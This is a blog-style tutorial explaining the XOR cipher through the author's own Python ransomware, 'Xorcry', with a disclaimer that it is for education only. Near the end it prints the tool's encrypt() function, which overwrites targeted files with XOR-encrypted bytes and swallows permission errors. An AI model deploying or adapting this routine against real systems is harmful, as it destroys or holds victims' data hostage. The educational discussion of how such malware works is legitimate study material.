Before we start here is the full code if you want to check it yourself Xorcry
Xorcry is open-source ransomware written in python3 to explain how actually ransomware or a crypter with a given cryptography algorithm works.
as a curious person, I really love to understand how things get to work deeply, and one of the questions that I’ve been asking for a long time was how does the ransomware work? after a lot of disappointing research to give my question a clear answer, I started diving into cryptography algorithms and malware understanding, so without any further ado let’s leave this boring introduction aside a bit and go with the cool part.
first of all, you must make sure that I did this tool only for educational purposes, secondly, if you are a cryptographer you will find this write-up boring you.
there are a lot of cryptography algorithms you can use to make ransomware but I’m not going to explain them for the reason that I didn’t use any known crypto algorithm, in fact, what I did is reading files as binary and xor them with a given key and this is what called xor cipher, but wait, I said xor cipher hmmm what is this? well, this will be our next topic.
I’ll assume that you have a background in Logic gates and what are they, but if you don’t I want you to take a deep look at this
article from Wikipedia :
well as you noticed In the xor operation, the output is true when the inputs differ. In other words, the xor operation means either one but not both or none.
Below you can find the principles of xor (^ denotes the xor operation):
0 ^ 0 = 0 0 ^ 1 = 1 1 ^ 0 = 1 1 ^ 1 = 0
xor cipher employs the xor logical operation in order to encrypt data. First, a random key is generated or chosen by you. Then, the xor operation is performed using the key so that encrypted data is created. In order to decrypt, the same key should be used and the xor operation should be run again.
xor operation uses the same key for both encryption and decryption operations. That is why it is known as symmetric encryption.
before covering the code explanation, I’ll assume again that you have the basics of the programming language Python in order to understand The rest of the code because I will cover only the most important function which is :
def encrypt(self , f) : ''' If the file's extension is one of the lists declared above then start XoRing ''' if self.check_ex(f) : try : with open(f , mode = "rb") as _file : rd = bytearray(_file.read()) for n , v in enumerate(rd) : rd[n] = v ^ self.key with open(f , mode = "wb") as _nf : _nf.write(rd) ''' This exception is especially for file permissions ''' except : pass
the first line I will talk about is the operation of reading the file we want to encrypt in binary mode and declaring a variable where we will put the binary data as a list using the built-in function bytearray(), I found this article useful for those who want to understand how does the bytearray() work :
after that, there is a for loop to edit the list by performing the xor operation for each element in the list with the given key and finally rewrite the file we have opened previously with the new encrypted data.
For Any Questions, You Can Find Me on This Platform:
This program must be used for legal purposes! I am not responsible for anything you do with it.